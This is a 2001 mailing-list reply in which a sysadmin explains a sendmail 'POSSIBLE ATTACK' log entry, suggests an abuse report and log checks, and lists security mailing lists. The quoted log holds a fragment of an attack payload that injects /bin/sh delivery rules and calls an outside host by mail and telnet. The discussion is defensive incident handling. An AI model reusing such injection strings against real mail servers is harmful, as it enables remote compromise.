[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [cobalt-users] Maybe OT: maillog reports attack; other lists?
- Subject: Re: [cobalt-users] Maybe OT: maillog reports attack; other lists?
- From: flash22@xxxxxxx
- Date: Sat Dec 22 17:48:11 2001
- List-id: Mailing list for users to share thoughts on Cobalt products. <cobalt-users.list.cobalt.com>
On Sat, 22 Dec 2001, Edward Bishop wrote:
> Dec 22 15:16:56 ns sendmail[9835]: NOQUEUE: POSSIBLE ATTACK from
> ara-as1-p193.netconnect.net.au: newline in string "iss^M Croot^M Mprog,
> P=/bin/sh, F=lsDFMeu, A=sh -c $u^M Mlocal, P=/bin/sh, F=lsDFMeu, A=sh -c
> $u^M R<"|/... Vulnerable | mail jimmy@xxxxxxxxxxxxxxxxx">^M R<"|( sleep 2 ;
> echo quit ) |telnet 203.87.15.193 5701"
etc
Sent a abuse@ complaint to netconnect, the IP's all belong to their user
dialup space, this is a kiddie script to root your machine via a rather
old sendmail exploit, you have a new enough sendmail that it did not work,
but you might want to grep other logs for that IP/domain to check other
services.
Basiclly, 'jimmy' is eligible to spend a few years in jail for that one
under current .au law ;P
Unless of course, you are in .au and jimmy is the government, in which
case it' sperfectly legal for them to haq your raq ;{
Various lists are all over...
http://lists.insecure.org/
has a nice incidents list,and it fairly linux aware
http://www.securityfocus.com/
Has lists, tho i find the archive database more usefull as a reference
http://www.cert.org/
also hs an advisory list, and a reporting list, tho the latter is relally
intended for actual break-ins
Interestingly, 'ISS' is also the acronym used for 'Internet Security
Systems' , aka 'xforce' who has security related lists etc...hmm
http://xforce.iss.net/
> SendmailIdentdBugVulnera: VRFY 1145130318@ISS
You didn't by any chance ask someone to test your server did you ?
gsh